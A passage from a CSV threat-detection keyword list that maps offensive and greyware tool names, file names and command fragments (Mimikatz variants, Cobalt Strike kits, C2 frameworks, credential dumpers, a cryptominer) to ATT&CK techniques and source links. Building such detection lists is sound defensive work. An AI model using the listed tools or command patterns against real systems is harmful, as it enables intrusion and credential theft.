is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" +"*GhostPack/Seatbelt*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*GhostPack/SharpDPAPI*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*Ghostpack-CompiledBinaries*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","857","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" +"*GhostWebShell.cs*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*gimmecredz*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*ginuerzh/gost*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","1","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z" +"*Gioyik/getExploit*","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" +"*git log -p | scanrepo *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*github*/COMHunter/*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*github*/DeathStar*","offensive_tool_keyword","DeathStar","DeathStar is a Python script that uses Empires RESTful API to automate gaining Domain and/or Enterprise Admin rights in Active Directory environments using some of the most common offensive TTPs.","T1078 - T1059 - T1047 - T1018 - T1069","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/byt3bl33d3r/DeathStar","1","0","N/A","N/A","10","1529","339","2022-12-08T07:44:30Z","2017-05-21T07:34:57Z" +"*github*/MoveKit.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*github*/Mr-xn/*","offensive_tool_keyword","spring-core-rce","github user infosec hosting exploitation tools","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" +"*github*/padre.git*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"*github*/xmrig/xmrig*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*github.com/*Reaper.exe*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*github.com/Arno0x*","offensive_tool_keyword","Github Username","Github username known for exploitation toos and scripts","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Arno0x","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*github.com/BishopFox*","offensive_tool_keyword","Github Username","Private professional services firm providing offensive security testing to the Fortune 500. serving exploitation tools on github","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/BishopFox","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*github.com/bishopfox/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*github.com/dafthack*","offensive_tool_keyword","Github Username","Github user hosting exploitation tools for pentest and redteam","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/dafthack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*github.com/g3tsyst3m*","offensive_tool_keyword","elevationstation","github user hosting multiple exploitation tools","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*github.com/GoSecure*","offensive_tool_keyword","Github Username","github repo name containing multiple exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/GoSecure","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*github.com/k8gege*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*github.com/MythicAgents/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*github.com/nccgroup*","offensive_tool_keyword","Github Username","github repo name hosting securty tools and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/nccgroup","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*github.com/quickbreach*","offensive_tool_keyword","Github Username","An infosec security researcher & penetration tester. hosting offensive tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/quickbreach","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*github.com/rasta-mouse/*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*github.com/sensepost*","offensive_tool_keyword","Github Username","github repo of orange cyberdefense red team","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/sensepost","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*github.com/SpiderLabs/*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" +"*github.io/weakpass/generator/*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" +"*GithubC2-main*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" +"*gitleaks detect*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*gitleaks*","offensive_tool_keyword","Gitleaks","Gitleaks is a SAST tool for detecting hardcoded secrets like passwords. api keys. and tokens in git repos. Gitleaks aims to be the easy-to-use. all-in-one solution for finding secrets. past or present. in your code.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/zricethezav/gitleaks","1","1","N/A","N/A","10","13901","1250","2023-10-03T15:38:08Z","2018-01-27T18:19:31Z" +"*Git-Scanner*","offensive_tool_keyword","Git-Scanner","A tool for bug hunting or pentesting for targeting websites that have open .git repositories available in public","T1213 - T1596 - T1190 - T1590","TA0007 - TA0009 - TA0001","N/A","N/A","Information Gathering","https://github.com/HightechSec/git-scanner","1","1","N/A","N/A","4","303","82","2020-06-23T05:44:26Z","2020-05-17T14:30:19Z" +"*GIUDA* -askluids*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*GIUDA-main.zip*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","1","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*give_dcsync.py*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"*gjknjjomckknofjidppipffbpoekiipm*","greyware_tool_keyword","VPN Free","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*gkojfkhlekighikafcpjkiklfbnlmeio*","greyware_tool_keyword","Hola Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*glassfish_war_upload_xsrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*glebarez/padre*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"*glit org -*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit repo *","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit user *","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit.exe org*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit.exe repo*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit.exe user*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit-i686-pc-windows-msvc*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit-main.zip*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit-x86_64-apple-darwin*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit-x86_64-pc-windows-msvc*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit-x86_64-unknown-linux-gnu*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*global.rel.tunnels.api.visualstudio.com*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A" +"*global.rel.tunnels.api.visualstudio.com*","greyware_tool_keyword","vscode","built-in port forwarding. This feature allows you to share locally running services over the internet to other people and devices.","T1090 - T1003 - T1571","TA0010 - TA0002 - TA0009","N/A","N/A","C2","https://twitter.com/code/status/1699869087071899669","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*global.rel.tunnels.api.visualstudio.com*","greyware_tool_keyword","vscode","Starts a reverse connection over global.rel.tunnels.api.visualstudio.com via websockets","T1090.003 - T1059.001 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://badoption.eu/blog/2023/01/31/code_c2.html","1","1","risk of False positive","10","10","N/A","N/A","N/A","N/A" +"*gloxec/CrossC2*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*gloxec/CrossC2*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*GmailC2.csproj*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" +"*gmsa_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*gMSADumper.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*gMSADumper.py*","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","2","190","34","2023-08-23T13:32:49Z","2021-04-10T00:15:24Z" +"*GMSAPasswordReader.exe*","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","103","23","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" +"*GMSAPasswordReader-master*","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","103","23","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" +"*GMShellcode*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*GMShellcode.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*GMShellcode\*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*go build Ivy.go*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*go get -u *traitor/cmd/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*go run poc.go check -t http://*:8080 -u Admin*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","0","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z" +"*go run scannerPort.go*","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","0","N/A","N/A","1","72","18","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" +"*go_shellcode_encode.py*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 